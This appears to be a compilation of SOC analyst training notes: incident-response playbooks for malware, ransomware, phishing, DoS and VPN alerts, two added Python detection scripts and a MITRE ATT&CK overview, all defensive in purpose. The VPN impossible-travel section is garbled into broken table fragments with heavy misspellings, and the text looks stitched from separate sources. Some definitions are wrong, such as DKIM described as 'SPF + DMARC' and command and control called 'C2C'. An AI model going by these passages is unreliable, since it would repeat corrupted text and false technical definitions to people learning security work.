1) Internal user - False positive
Log sources are AV/EDR/XDR, AM, Email GW, NGFW / NIDS/NIPS; log source action: Block / Quarantine / Deny / Clean
Alert: Dashboard / Email notification
Create a ticket: ServiceNow
Classify the incident: based on the risk score, severity and also impact
Triage:
Asset profiling: Asset IP address, Asset OS, OS type, Model number, File name, File size, File category, Hash value of the file, Data source name / Log source name, Data source action / Log source action, Payload, Event time stamp
User profiling: Victim IP - Private IP, User name, Team name
Attacker profiling: Attacker IP, Attacker country, TTP

2) External attacker - False positive
Log analysis: verify the address is legitimate, Hash value reputation, Domain validation, URL link
Log source action / Data source action: Block / Quarantine
Verify the outbound connections from internal or victim IP to attacker (C2C communications)

3) External attack - True positive
Alert: Dashboard / Email notification
Create a ticket: ServiceNow
Classify the incident: based on the risk score, severity and also impact
Triage:
Asset profiling: Asset IP address, Asset OS, OS type, Model number, File name, File size, File category, Hash value of the file, Data source name / Log source name, Data source action / Log source action: Allow, Payload, Event time stamp
User profiling: Victim IP - Private IP, User name, Team name
Attacker profiling: Attacker IP, Attacker country, TTP
Investigation analysis: Hash value verification, IP address validation, C2C communication from the victim machine to the attacker IP address
Malware: One of the END USER SYSTEMS (Laptop, MacBook, workstation or desktop) got compromised by Malware

1. Recently I have done a "one of the end user systems got compromised by malware" incident investigation.
2. Alert is received through IBM QRadar SIEM dashboard and also from email notification.
3. I went to the SIEM dashboard, assigned the ticket to myself and also acknowledged to other SOC team members as well.
4. After that I went and created a ticket in the ticketing tool. In my organization we are using the ServiceNow ticketing tool for tracking of the incidents.
5. After creating the ticket in the ticketing tool, I started triage of the information like IOC, IOA, asset profiling, user profiling. Nothing but I have gathered victim IP related details, IP address, username or system name and where the system is located.
6. I gathered additionally file name, file size, file category and file extension.
7. This attack was received through a .dll file when the user downloaded the file from a trojan website.
8. I have done containment (as per incident life cycle management) from the network of whatever system got compromised, after analysing the BIA (business impact analysis) and also risk assessment.
9. I have taken the file and analyzed it in the sandboxing environment and finally I came to know that the file has malware, and also I have taken the SHA 256 value.
10. In the eradication phase I deleted the file from the end user machine, re-ran the AV scans and also changed the password by contacting the helpdesk/service desk team.
11. In the recovery phase brought it back from abnormal to normal operations.
12. In the Lessons learned phase, as a post mortem report, I have prepared a root cause analysis document and finally I analyzed why, how and when it got compromised. The reason behind the compromise: regular Windows patch updates are not happening and also the AV agent was sleeping when the attack happened; due to this reason, when the user downloaded the .dll file from the trojan or illegitimate website, the system got compromised.
13. I reviewed the RCA document with the SOC manager and presented it to my client or customer.
14. Due to this reason I got an appreciation email and also got selected for the monthly award due to my productivity and quality of the incidents I was handling.
Server - Malware investigation (Windows, Unix, Middleware, Webserver or DB server etc)

1) Internal user - False positive
Log sources are AV/EDR/XDR, AM, NGFW / NIDS/NIPS; log source action: Block / Quarantine / Deny / Clean
Alert: Dashboard / Email notification
Create a ticket: ServiceNow
Classify the incident: based on the risk score, severity and also impact
Triage:
Asset profiling: Asset IP address, Asset OS, OS type, Model number, File name, File size, File category, Hash value of the file, Data source name / Log source name, Data source action / Log source action, Payload, Event time stamp
User profiling: Victim IP - Private IP, User name, Team name

2) External attacker - False positive
Log analysis: verify the address is legitimate, Hash value reputation, Domain validation, URL link
Log source action / Data source action: Block / Quarantine
Verify the outbound connections from internal or victim IP to attacker (C2C communications)

3) External attack - True positive
Alert: Dashboard / Email notification
Create a ticket: ServiceNow
Classify the incident: based on the risk score, severity and also impact
Triage:
Asset profiling: Asset IP address, Asset OS, OS type, Model number, File name, File size, File category, Hash value of the file, Data source name / Log source name, Data source action / Log source action: Allow, Payload, Event time stamp, Asset name / System name / Computer name / FQDN (e.g. appprodcts.com, devdbcts.com, Mirrortestcts.com)
User profiling: User role, User name, Team name
Attacker profiling: Attacker IP, Attacker country, TTP

Questions for the server owner before containment:
1) Whether the server belongs to internal facing servers or internet facing servers?
2) How many end users are accessing the server?
3) Is there any backup server? (Redundancy server, backup server)
4) Are you taking regular backups? (SAN, NAS, Veeam, Microsoft cloud, Google cloud, magnetic tapes)
5) What is the criticality of the server?
6) Is there any confidential data stored on the server? Is there any PII data or PHI data stored?
7) On top of the server, are there any applications running?
8) If we are doing containment, is there any availability impact or outage impact to the users and also the public?
Ransomware (End Point and server)

Data source / Log source - Log integration method:
AV/EDR - API token (SaaS) / Syslog (Hardware)
NGFW - Syslog
AM - Syslog / API token
NIDS/NIPS - Syslog
Email GW - API token / Syslog
Log collector: Aggregation, Parsing and Normalization
Log processor / Log Manager: Processing of the logs, Filtering, Indexing, Querying, CRE engine - Malware detected, Trojan detected, Virus detected, Abnormal / Malicious / Suspicious pattern behaviour of the file
SIEM (dashboard / Alerts): Alerts / Incident / Alarm / Offenses - Malware detection

Ransomware: One of the END USER SYSTEMS (Laptop, MacBook, workstation or desktop) got compromised by Ransomware

1. Recently I have done a "one of the end user systems got compromised by ransomware" incident investigation.
2. Alert is received through IBM QRadar SIEM dashboard and also from email notification.
3. I went to the SIEM dashboard, assigned the ticket to myself and also acknowledged to other SOC team members as well.
4. After that I went and created a ticket in the ticketing tool. In my organization we are using the ServiceNow ticketing tool for tracking of the incidents.
5. After creating the ticket in the ticketing tool, I started triage of the information like IOC, IOA, asset profiling, user profiling. Nothing but I have gathered victim IP related details, IP address, username or system name and where the system is located.
6. I gathered additionally file name, file size, file category and file extension.
7. This attack was received through a .dll file when the user downloaded the file from a trojan website. As per the cyber kill chain process a couple of files got infected and the system got compromised.
8. I spoke with the help desk team whether they are taking regular backups or not. Fortunately the help desk team / Corporate IT team is taking regular backups.
9. I have done containment (as per incident life cycle management) from the network of whatever system got compromised, after analysing the BIA (business impact analysis) and also risk assessment.
10. In the eradication phase, with the help of the service desk team, formatted the system and re-ran the AV scans.
11. In the recovery phase brought it back from abnormal to normal operations.
12. In the Lessons learned phase, as a post mortem report, I have prepared a root cause analysis document and finally I analyzed why, how and when it got compromised. The reason behind the compromise: regular Windows patch updates are not happening and also the AV agent was sleeping when the attack happened; due to this reason, when the user downloaded the .dll file from the trojan or illegitimate website, the system got compromised.
13. I reviewed the RCA document with the SOC manager and presented it to my client or customer.
14. Due to this reason I got an appreciation email and also got selected for the monthly award due to my productivity and quality of the incidents I was handling.

Ransomware: One of the SERVERS got compromised by Ransomware

1. Recently I have done a "one of the servers got compromised by ransomware" incident investigation.
2. Alert is received through IBM QRadar SIEM dashboard and also from email notification.
3. I went to the SIEM dashboard of offenses, assigned the ticket to myself and also acknowledged to other SOC team members as well.
4. After that I went and created a ticket in the ticketing tool. In my organization we are using the ServiceNow ticketing tool for tracking of the incidents.
5. After creating the ticket in the ticketing tool, I started triage of the information like IOC, IOA, asset profiling, user profiling. Nothing but I have gathered victim IP related details, IP address, username or system name and where the system is located.
6. I gathered additionally file name, file size, file category and file extension.
7. This attack was received through a .dll file when the Windows server admin downloaded the file from a trojan website.
8. After that I went and created a ticket in the ticketing tool. In my organization we are using the ServiceNow ticketing tool for tracking of the incidents.
9. This is an escalated priority 1 (P1) ticket, and I scheduled a call with the asset owner and asked a couple of questions before doing the containment (network isolation):
a) Is there any backup server available?
b) Are you taking any regular backup config?
c) Are there any critical applications running on top of this server?
d) How many users are going to be impacted in case we are taking network isolation or containment?
I got the below answers from the asset owner or server owner:
a) Yes, a backup server is available, it is facing the internet and it is a critical server to the organization.
b) Yes, they are taking regular backups with Veeam.
c) Yes, critical legacy applications are running (basic Java based application developed long back).
d) A large number of users are going to be impacted.
10. Based on the server owner's confirmation and details, I made the backup server the primary and continued the business operations without impacting any users.
11. Whatever server got compromised, I have done network isolation in the containment phase.
12. In the eradication phase, with the help of the Windows server team, formatted the server and imported the backup config file from the backup, bringing it back to normal operation as high availability.
13. Finally I brought it back to high availability within the SLA of 4 hours defined in the recovery phase.
14. In the Lessons learned phase, as a post mortem report, I have prepared a root cause analysis document and finally I analyzed why, how and when it got compromised. The reason behind the compromise: regular Windows patch updates are not happening and also the AV agent was sleeping when the attack happened. Due to this reason, when the user downloaded the .dll file from the trojan or illegitimate website, the system got compromised.
15. I reviewed the Lessons learned document with the SOC manager and presented it to my client or customer.
16. Due to this reason I got an appreciation email and also got selected for the monthly award due to my productivity and quality of the incidents I was handling.
One of the systems got compromised and it keeps on contacting the command and control server (C2C)

Data source / Log source: All log sources
Log integration method: All log integration methods
Log collector: Aggregation, Parsing and normalization
Log processor / Log Manager: Indexing, Filtering, Querying, CRE Engine - All categories of attacks
SIEM (dashboard / Alerts): Email notification alert

1) Create a ticket
2) Classify the incident (based on the correlation rule name): True positive
3) Triage: Asset profiling, User profiling, Attacker profiling

Confirmation of false positive or true positive:
1) Outbound connections from internal IP to external IP - Firewall logs
2) IP address validation - non business IP and it is a malicious IP (contact the network admin)
3) Hash value validation (if the alert is malware)
4) Malicious URL (if the alert has any URL logs)
5) Payload
6) Domain
OWASP TOP 10

Data source / Log source - Log integration method:
DB server - Collector agent / Syslog
App server / Web server - Collector agent / Syslog
WAF - Syslog / API token
NGFW (WAF) - Syslog
Application (API) - API token (Apps)
Log collector: Aggregation, Normalization and parsing
Log processor / Log Manager: Indexing, Querying, Filtering and CRE engine
SIEM (dashboard / Alerts): Alert or Offense, Alarm or Security incident

1) Internal user - false positive: Authentication failure
2) External attacker - false positive: OWASP TOP 10
3) External attacker - true positive: Broken authentication, Broken access control, Injection flaw attack, XSS or CSS, Forgery (CSRF or SSRF)

Application 3 tier architecture: User layer or Front end; Business or logical layer; DB layer
Input validation issue: speak with developers. Front end inputs: User name, Password, Like, share, comment, Feedback, summary. Fix: input validation, parameterised queries.

DB layer

Data source / Log


source Log integration method Log colelctor Log processor / Log Manager SIEM ( dash board/ Alerts)

Use case or Practical


scenarios VPN
SSO (OKTA, Microsoft identity, Ping
identify , IBM, Cyber ark etc )

NGFW Syslog
AD/DC Collector agent
Application logs /
Web server logs API, Syslog
Systtem / Computer Colllector agent Parsing, aggragation and Querying , indexing , Filtering , CRE
VPN tools Syslog Nrmalization engine
Dash abord/ Email notifcstion

VPN impossible traversal atatck False spotive


Asset profling User rpfoling Attacker profling
atatcker ip
Asset anem /Computer name / System name User name address
Location of the
Asst location Ip addresss atatcker
Event tiem astamp Location s TTP
Payload
Log source / Dat asource
Block/ Deny/
Packet dropped
/ Packet Reset
/ Packet
Log source action / data slource action retransmitted
Authication success or fialure
Attacker ip 57.128.222.4 LT
57.128.224.5 Mac

Internal user 10.10.10.1 Chanti Malysia


India
Hongkong
Singepore

True Positive
1) Alert will be triggered int eh SIEM tool dashbaord or EMail notifcation
2) Assignin the ticket and create ticket in the ITSM tool
Traigeing of the incieent
Attacker
User proflig Asset prifling profiling

User name OS type Atatcker ip


Location Model nuber Attacker country
Data source System/Comput
name / Log er name /
source name FQDN TTP
Event time tiem
stamp
Victim IP
Dat source /
Log source
action
Pyaload
Firewall policy
VPN policy

Open source
tools /
Attacker ip address reputation Commecriasl
Victim ip to
atatcker or C2C
communication
C2C comminication /0 as aoutound

Successful
authtication
from the
atatcker ip
VPN logs / NGFW logs address Allow
Packet allow
Logsource / data source action Allow
DoS / DDoS (all OSI layers)

Data source / Log source   Log integration method           Log collector              Log processor / Log manager                 SIEM (dashboard / alerts)
Anti-DoS / Anti-DDoS       Syslog / API / Cloud connector   Collector agent / Syslog   Aggregation, parsing and normalization;     Dashboard / email
NGFW                       Syslog                                                      filtering, indexing, querying, CRE:
NIDS/NIPS                  Syslog                                                      TCP, UDP, ICMP, MAC, ARP, RARP, DoS, DDoS
Server                     Collector agent / Syslog
WAF                        Syslog / API
SWG                        Syslog / API

DoS attack, internal user - false positive
User profiling: user name, IP address, log source / data source, log source / data source action (Deny / Locked / Block), payload
Asset profiling: asset name, asset OS, model number, name of the asset, location of the asset, payload

DoS attack, external attack - false positive
User profiling: user name, IP address, log source / data source, log source / data source action (Deny / Locked / Block), payload
Asset profiling: asset name, asset OS, model number, name of the asset, location of the asset, payload
Attacker info: attacker IP, location of the IP, country, TTP

External attack - true positive
User profiling: user name, IP address, log source / data source, log source / data source action (Allow / packet is allowed), payload
Asset profiling: asset name, asset OS, model number, name of the asset, location of the asset, payload
Attacker info: attacker IP, location of the IP, country, TTP
Verify the outbound connections from the victim IP to non-business IPs / external IPs
1) Endpoint containment
2) Server / DB / Application / Cloud instance: BIA / RM

Summary: DDoS from an internal user - false positive; external attacker, traffic blocked - false positive; external attacker DDoS allowed - true positive, end user containment. We should go and ask the business owner (DB / middleware / Windows / Linux / App / product / OT / cloud instance owner).
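The DoS/DDoS triage above (volume per victim, one source versus many, and Deny meaning false positive while Allow means true positive) can be expressed as a simple correlation over firewall logs. The following is an added example, not from the original notes: it buckets constructed NGFW syslog lines into one-second windows per destination, treats a burst above a threshold as DoS when one source dominates and DDoS when it is spread across many sources, and sets the verdict from the firewall action on the flood traffic. The log lines and the thresholds are constructed; a real rule would use the production rate limit.

```python
"""DoS vs DDoS detection over firewall syslog.

Added example, not from the original notes. Counts packets per destination
in fixed one-second buckets. A burst above the threshold is DoS when one
source carries most of it and DDoS when the volume is spread across many
sources. Following the notes' triage, a burst the firewall already denied
is a false positive; an allowed burst is a true positive needing
containment. Log lines and thresholds are constructed.
"""
from collections import Counter, defaultdict

THRESHOLD_PPS = 5        # constructed for the sample; production uses e.g. a 10000/sec limit
DOS_DOMINANCE = 0.8      # one source carrying >= 80% of a burst => single-source DoS

# Constructed NGFW lines: epoch_second src_ip dst_ip dst_port action
SAMPLE_LOGS = """\
1700000000 198.51.100.9 10.0.0.5 443 Deny
1700000000 198.51.100.9 10.0.0.5 443 Deny
1700000000 198.51.100.9 10.0.0.5 443 Deny
1700000000 198.51.100.9 10.0.0.5 443 Deny
1700000000 198.51.100.9 10.0.0.5 443 Deny
1700000000 198.51.100.9 10.0.0.5 443 Deny
1700000000 10.10.10.1 10.0.0.5 443 Allow
1700000001 203.0.113.1 10.0.0.8 80 Allow
1700000001 203.0.113.2 10.0.0.8 80 Allow
1700000001 203.0.113.3 10.0.0.8 80 Allow
1700000001 203.0.113.4 10.0.0.8 80 Allow
1700000001 203.0.113.5 10.0.0.8 80 Allow
1700000001 203.0.113.6 10.0.0.8 80 Allow
1700000002 10.10.10.1 10.0.0.5 443 Allow
"""


def parse(text):
    """Yield (second, src, dst, port, action) tuples from the sample format."""
    for line in text.strip().splitlines():
        ts, src, dst, port, action = line.split()
        yield int(ts), src, dst, int(port), action


def detect_floods(lines, threshold=THRESHOLD_PPS, dominance=DOS_DOMINANCE):
    """Return one finding per (second, victim) bucket that exceeds the threshold."""
    buckets = defaultdict(list)  # (second, dst) -> [(src, action), ...]
    for ts, src, dst, _port, action in parse(lines):
        buckets[(ts, dst)].append((src, action))

    findings = []
    for (ts, dst), hits in sorted(buckets.items()):
        if len(hits) <= threshold:
            continue
        sources = Counter(src for src, _ in hits)
        top_src, top_n = sources.most_common(1)[0]
        kind = "DoS" if top_n / len(hits) >= dominance else "DDoS"
        # Judge the action on the flood traffic itself, not on the legitimate
        # packets that happened to share the bucket.
        if kind == "DoS":
            flood_actions = [a for s, a in hits if s == top_src]
        else:
            flood_actions = [a for _, a in hits]
        allowed = sum(1 for a in flood_actions if a == "Allow")
        findings.append({
            "second": ts, "victim": dst, "packets": len(hits),
            "kind": kind, "sources": len(sources),
            "top_source": top_src if kind == "DoS" else None,
            "allowed": allowed,
            "verdict": "true_positive" if allowed else "false_positive",
        })
    return findings


if __name__ == "__main__":
    for finding in detect_floods(SAMPLE_LOGS):
        print(finding)
```

The first bucket is a single-source flood against 10.0.0.5 that the NGFW denied (false positive per the notes); the second is a six-source burst against 10.0.0.8 that was allowed (true positive, go to containment and the asset owner).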
Phishing email incident investigation

Log source / Data source   Log integration method          Log collector                 Log manager                             SIEM
SMTP server                API token / collector agent     Aggregation, parsing,         Indexing, querying, filtering, CRE      Alert / Incident / Alarm / Offense
Email GW                   API token / Syslog              normalization
NGFW                       Syslog
Proxy                      Syslog / API token method
EDR/AV/XDR                 API token / Syslog

Phishing email investigation without a SIEM tool: identify the type of the phishing, then classify as false positive or true positive.

Phishing email investigation with a SIEM tool

Possible scenarios
1) Generic phishing email
2) Spear phishing email
3) Whaling
4) Malicious URL link, single user or group of users
5) Malicious malware investigation
6) QR code (malware)
7) Single attacker sent a phishing email to a single user
8) Single attacker sent a phishing email to a group of users (multiple)
9) Single attacker sent an email to a single user using a malicious URL link
10) Single phishing email sent to multiple users using a malicious URL link (multiple)
11) Single attacker sent a phishing email using a malware attachment (QR code) to a single user
12) Single attacker sent an email to multiple users (QR code or any other file) (multiple)

SPF (Sender Policy Framework): it is an authentication method or mechanism and it can be used to prevent email spoofing attacks.

DMARC: it is an authentication protocol (rule or regulation or logic or algorithm) to allow or block or prevent email spoofing attacks.

DKIM (DomainKeys Identified Mail): SPF + DMARC

Phishing email: the attacker will trick the end user by sending an email and will gain unauthorised access or cause sensitive data exposure.

How can we identify or suspect a phishing email
Lottery email
Job opportunity emails
Gift card
Voucher card
Invoice copies
Malicious malware attachments
Malicious URL links
Spelling mistakes
Adult content

Types of phishing
Spear phishing - email will be sent to a single user or group of users
Whaling - board of directors or senior management (CTO, CIO, CEO, CFO, CISO, VP, Director)
Vishing - by phone call
Smishing - through messages or SMS
Malicious attachment - malicious attachment via email
Malicious URL link

Email contains technical parameters and non-technical parameters
Technical parameters: sender email address, recipient email address, sender IP, recipient IP, DMARC, DKIM, DK, SPF, return path, header analyzer
Non-technical parameters: to, cc, bcc, subject line

Email gateways or email security: Proofpoint, IronPort, Mimecast, O365 ATP, Trianz

1) Generic phishing email

1) Domain validation
   a) Malicious: take the malicious domain and block the domain in the NGFW, email GW, DNS server, proxy or SMTP server
   b) In case the domain is non-malicious, go for further investigation
2) IP validation: take the IP address and check its reputation
   a) If it is a malicious IP address, block the IP address on the firewall side
   b) If it is non-malicious, go for further investigation
3) Header analyzer: check the SPF, DKIM and DMARC results and the combination in which they appear
   SPF passed, DKIM passed, DMARC passed
   DMARC failed, DKIM passed
   DMARC passed, DKIM failed
   SPF passed, DKIM failed
   SPF failed, DKIM passed
   SPF passed, DMARC passed
   SPF failed, DMARC passed
   SPF passed, DMARC failed
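The SPF / DKIM / DMARC definitions and the header-analyzer step above come together when a triage script reads the authentication results the receiving mail server stamped on the message. The following is an added example, not from the original notes: it parses the Authentication-Results header (RFC 8601) plus From and Return-Path from a raw message, checks whether the From domain aligns with the Return-Path domain, and maps the pass/fail combination to a triage verdict and the next step the notes prescribe (block the domain/IP, or continue with domain, IP, URL and hash validation). The three sample messages are constructed and use the reserved example.com / example.net / example.org domains.

```python
"""SPF / DKIM / DMARC header analysis for phishing triage.

Added example, not from the original notes. Parses the Authentication-
Results header (RFC 8601) that the receiving mail server adds, plus From
and Return-Path, and classifies the pass/fail combination the way the
notes' header-analyzer step does. Sample messages are constructed.
"""
import re
from email import message_from_string
from email.utils import parseaddr

RESULT_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.IGNORECASE)

# Constructed sample: everything passes, From and Return-Path agree.
LEGIT = """\
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=example.com; dkim=pass header.d=example.com; dmarc=pass header.from=example.com
Return-Path: <billing@example.com>
From: Billing <billing@example.com>
To: user@example.net
Subject: Invoice copy

Please find the invoice attached.
"""

# Constructed sample: display From claims example.com but the bounce path and
# SPF identity belong to another domain, and DMARC fails.
SPOOFED = """\
Authentication-Results: mx.example.net; spf=fail smtp.mailfrom=mail.example.org; dkim=none; dmarc=fail header.from=example.com
Return-Path: <bounce@mail.example.org>
From: CEO <ceo@example.com>
To: user@example.net
Subject: Urgent gift card request

Please buy gift cards and send me the codes.
"""

# Constructed sample: SPF passes, DKIM signature broken, no DMARC policy.
PARTIAL = """\
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=example.com; dkim=fail header.d=example.com; dmarc=none header.from=example.com
Return-Path: <newsletter@example.com>
From: News <newsletter@example.com>
To: user@example.net
Subject: Weekly update

Hello.
"""


def domain_of(addr_header):
    """Return the lower-cased domain of an address header ('' if none)."""
    _, addr = parseaddr(addr_header or "")
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def auth_results(raw):
    """Extract spf/dkim/dmarc results and From / Return-Path alignment."""
    msg = message_from_string(raw)
    results = {"spf": "none", "dkim": "none", "dmarc": "none"}
    for hdr in msg.get_all("Authentication-Results", []):
        for method, result in RESULT_RE.findall(hdr):
            results[method.lower()] = result.lower()
    results["from_domain"] = domain_of(msg.get("From"))
    results["return_path_domain"] = domain_of(msg.get("Return-Path"))
    results["aligned"] = (results["from_domain"] != ""
                          and results["from_domain"] == results["return_path_domain"])
    return results


def classify(results):
    """Map the pass/fail combination to (verdict, next step) for the analyst."""
    spf, dkim, dmarc = results["spf"], results["dkim"], results["dmarc"]
    if dmarc == "fail" or (spf == "fail" and dkim == "fail"):
        return ("spoofing_suspected",
                "treat the sender as malicious: block the domain / IP and continue the investigation")
    if spf == "pass" and dkim == "pass" and dmarc == "pass":
        return ("authenticated",
                "sender is legitimate for its domain: continue with domain, IP, URL and hash validation")
    if dmarc != "pass" and not results["aligned"]:
        return ("misaligned",
                "From and Return-Path domains differ and DMARC did not pass: verify the sending domain")
    return ("partial",
            f"spf={spf} dkim={dkim} dmarc={dmarc}: manual header analysis required")


if __name__ == "__main__":
    for name, raw in (("legit", LEGIT), ("spoofed", SPOOFED), ("partial", PARTIAL)):
        print(name, classify(auth_results(raw)))
```

An "authenticated" result only says the mail really came from the domain it claims; a phishing mail sent from a look-alike domain the attacker controls will pass all three checks, which is why the notes still require domain, IP, URL and hash validation afterwards.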
4) Malicious URL link
   a) Malicious URL link: block the URL in the NGFW or proxy
   b) Non-malicious URL link: just go for further investigation
5) Malicious malware attachment: check the reputation of the hash value
   a) Malicious: block the hash value in the EDR/XDR/AV tool
   b) Non-malicious phishing email
   Based on the above parameters, classify the phishing email as a malicious phishing email or non-malicious.
6) Manual header analysis: verify the HTML header manually for SPF, DMARC, DKIM, return path, IP address, domain name, content of the body, URL link, hash value

2) Spear phishing email: 1) false positive, 2) true positive

1) False positive
   Try to verify whether one user received it or a group of users received it: network ID, message ID, subject line, sender email address
   Verify the action of the log source (email GW, NGFW, EDR, proxy): blocking or quarantine
   Additionally verify C2C outbound connections: there are no C2C connections
2) True positive
   Try to verify whether one user received it or a group of users received it: network ID, message ID, subject line, sender email address
   Verify the action of the log source (email GW, NGFW, EDR, proxy): allow
   Additionally verify C2C outbound connections: outbound connections from the internal end user or end users to the C2C (command and control)
   Containment: network isolation
   Remediation: Outlook password reset, DLP logs

3) Whaling phishing email: 1) false positive, 2) true positive

1) False positive
   Try to verify whether one user received it or a group of users received it: network ID, message ID, subject line, sender email address
   Verify the action of the log source (email GW, NGFW, EDR, proxy): blocking or quarantine
   Additionally verify C2C outbound connections: there are no C2C connections
2) True positive
   Try to verify whether one user received it or a group of users received it: network ID, message ID, subject line, sender email address
   Verify the action of the log source (email GW, NGFW, EDR, proxy): allow
   Additionally verify C2C outbound connections: outbound connections from the internal end user or end users to the C2C (command and control)
   Containment: network isolation
   Remediation: Outlook password reset, DLP logs

4) Malicious URL phishing email (single user and multiple users)

1) False positive - URL validation
   a) Malicious URL: block or quarantine; analyse all the analysis, upload the evidences and close the incident
   b) Non-malicious URL: allow / clean; analyse all the analysis, upload the evidences and close the incident
2) True positive - URL validation, malicious
   Single user: did the user click or not? Verify the FW logs and also the email GW and NGFW logs; check C2C connections to the attacker
     Containment of the end user machine
     Blocking of the URL link; blocking of the IP address; reset passwords; re-run the AV scans; DLP logs - was data copied by the attacker or not; verify the backup; verify whether the attacker sent emails to other end users on behalf of the end user
     Bringing it back from abnormal to normal
     RCA analysis and discussion with the team members, and finally present to the customer or client
     Security awareness training to all the users and also phishing email campaigns
   Multiple users: how many users clicked or did not click on the link; identify all the users who clicked; verify the C2C communications from the internal users to the external attackers
     Containment of all those machines; then the same blocking, password reset, AV scan, DLP, backup, RCA, customer presentation and awareness steps as for a single user
   Users who did not click on the link: false positive
   Process followed: ITIL process or NIST framework

5) Malicious malware attachment phishing email (single user and multiple users)

1) Single user (log sources: EDR/AV/XDR, email GW, NGFW, AM)
   Single user did not click on it: false positive
   Single user clicked on it and the action was blocked: false positive; verify the outbound connections from the victim IP to the C2C / attacker IP address
   User clicked on it and the action was allow: true positive
     Malware analysis tool
     Verify the outbound connections
     Verify whether lateral movement happened or not
     Verify whether a privilege escalation attack happened or not
     Verify the end user's Outlook account: are there any outbound emails going to internal employees of the organization
     Verify whether data exfiltration happened or not
     Verify lateral movement to other end users and disconnect them from the network
     Verify whether any data was copied by the attacker as data exfiltration
     Containment; bringing it back from abnormal to normal operations
     Block the IP address of the attacker in the NGFW; block the hash value in the EDR/AV/XDR tool; reset the password of the victim user's credentials; if a privilege escalation happened, change the admin credentials by resetting the password
     Create an RCA analysis document as a reference document, or submit it to the customer for future purposes; then review the document with the internal team members and also with the external customers
2) Multiple users (e.g. 100 users received those emails)
   Users clicked on it, action blocked (EDR/NGFW/AM/AV/XDR): verify the outbound connections from the victim IP to the C2C / attacker IP: false positive. Delete the email from the email GW or SMTP server; deleting the email from the centralised email GW or SMTP server is called email purging.
   Users did not click on it: false positive
   Users clicked on it, action allow (EDR/NGFW/AV/AM): true positive
     Verify the outbound connections from the victim IP to the C2C / attacker IP; lateral movement verified; privilege escalation from the user to an admin account; hash value verification; NGFW and DLP logs - is there data exfiltration
     Containment; bringing it back to normal operations
     Block the IP address in the NGFW; block the hash value in the EDR tool; reset the password (raise a ticket to the Outlook team)
     Create an RCA document; submit the report to the client or customer; provide awareness
What is the MITRE ATT&CK Framework?

The MITRE ATT&CK Framework is a structured, detailed knowledge base of attacker behaviors. It maps tactics (why), techniques (how), and procedures (specific steps) used by real-world adversaries, helping SOC analysts detect, prevent, and respond effectively.

1) Initial Access

1. What is it?
How attackers first get access to a system or environment.

2. What can an attacker do?
- Phishing (T1566): Tricking users with fake emails
  - Spear Phishing Attachment (T1566.001)
  - Spear Phishing Link (T1566.002)
- Exploit Public-Facing Application (T1190): Attacking vulnerable web apps

3. What can a SOC analyst do?
- Implement email filtering and phishing simulations
- Regularly patch public-facing apps
- Monitor for exploit attempts and suspicious logins

BY HARSH KADU
2) Execution

1. What is it?
How attackers run malicious code.

2. What can an attacker do?
- PowerShell (T1059.001): Using the PowerShell command-line tool to execute malicious scripts.
- Command and Scripting Interpreter (T1059): Using script interpreters like Bash, Python, or JavaScript to execute code.

3. What can a SOC analyst do?
- Monitor script interpreter usage
- Use EDR tools with command-line visibility
- Restrict PowerShell use and log all activity

3) Persistence

1. What is it?
How attackers stay on a system even after a reboot.

2. What can an attacker do?
- Scheduled Task/Job (T1053): Setting up tasks or jobs to run malicious code at regular intervals.
- Boot or Logon AutoStart Execution (T1547): Configuring the system to execute malicious code upon startup.

3. What can a SOC analyst do?
- Monitor system changes and scheduled tasks
- Restrict admin privileges
- Use persistence-detection rules in SIEM

4) Privilege Escalation

1. What is it?
How attackers gain higher-level permissions.

2. What can an attacker do?
- Exploitation for Privilege Escalation (T1068): Exploiting vulnerabilities to gain higher-level permissions.
- Valid Accounts (T1078): Using legitimate credentials to escalate privileges.

3. What can a SOC analyst do?
- Apply security patches
- Monitor for privilege escalation patterns
- Alert on unusual account activity

5) Defense Evasion

1. What is it?
How attackers hide their activities.

2. What can an attacker do?
- Obfuscated Files or Information (T1027): Hiding malicious code using techniques like encoding or encryption.
- Disabling Security Tools (T1562): Turning off antivirus or other security tools to avoid detection.

3. What can a SOC analyst do?
- Alert on AV/EDR service termination
- Detect file obfuscation techniques
- Harden systems to prevent tampering

6) Credential Access

1. What is it?
How attackers steal login details.

2. What can an attacker do?
- Credential Dumping (T1003): Extracting account credentials from the operating system.
- Keylogging (T1056.001): Capturing keystrokes to steal usernames and passwords.

3. What can a SOC analyst do?
- Monitor LSASS access
- Use Credential Guard and Secure Boot
- Detect anomalous login behavior

7) Discovery

1. What is it?
How attackers gather information about the system.

2. What can an attacker do?
- Network Service Scanning (T1046): Scanning for open ports and services on the network.
- System Information Discovery (T1082): Gathering details about the operating system and hardware.

3. What can a SOC analyst do?
- Log and analyze network scan attempts
- Restrict unnecessary protocol access

8) Lateral Movement

1. What is it?
How attackers move through the network.

2. What can an attacker do?
- Remote Desktop Protocol (RDP) (T1021.001): Using RDP to move laterally between systems.

3. What can a SOC analyst do?
- Monitor RDP usage and failed login attempts
- Use network segmentation
- Alert on unauthorized remote access

9) Collection

1. What is it?
How attackers collect data (e.g., copying files).

2. What can an attacker do?
- Data from Local System (T1005): Collecting files and information stored on the local machine.
- Input Capture (T1056): Capturing user input like keystrokes or screen captures.

3. What can a SOC analyst do?
- Detect large file access or copies
- Use DLP and endpoint monitoring
- Monitor clipboard and keystroke behavior

10) Command and Control (C2)

1. What is it?
How attackers communicate with the compromised system.

2. What can an attacker do?
- Application Layer Protocol (T1071): Using standard web protocols like HTTP or HTTPS to communicate with compromised systems.
- Remote Access Software (T1219): Using legitimate remote access tools for communication and control.

3. What can a SOC analyst do?
- Analyze network traffic for anomalies
- Monitor outbound connections and DNS tunneling
- Block unauthorized remote software

11) Exfiltration

1. What is it?
How attackers steal data (e.g., transferring files out of the network).

2. What can an attacker do?
- Exfiltration Over C2 Channel (T1041): Using the command and control channel to exfiltrate data.
- Exfiltration Over Web Service (T1567): Sending stolen data to an external web service.

3. What can a SOC analyst do?
- Use DLP tools
- Monitor unusual outbound traffic

12) Impact

1. What is it?
How attackers cause damage (e.g., encrypting data with ransomware).

2. What can an attacker do?
- Data Encrypted for Impact (T1486): Encrypting data to render it unusable, often seen in ransomware attacks.
- Data Destruction (T1485): Deleting or corrupting data to disrupt operations.

3. What can a SOC analyst do?
- Implement backups and versioning
- Monitor for mass encryption or deletion
- Have a tested incident response plan
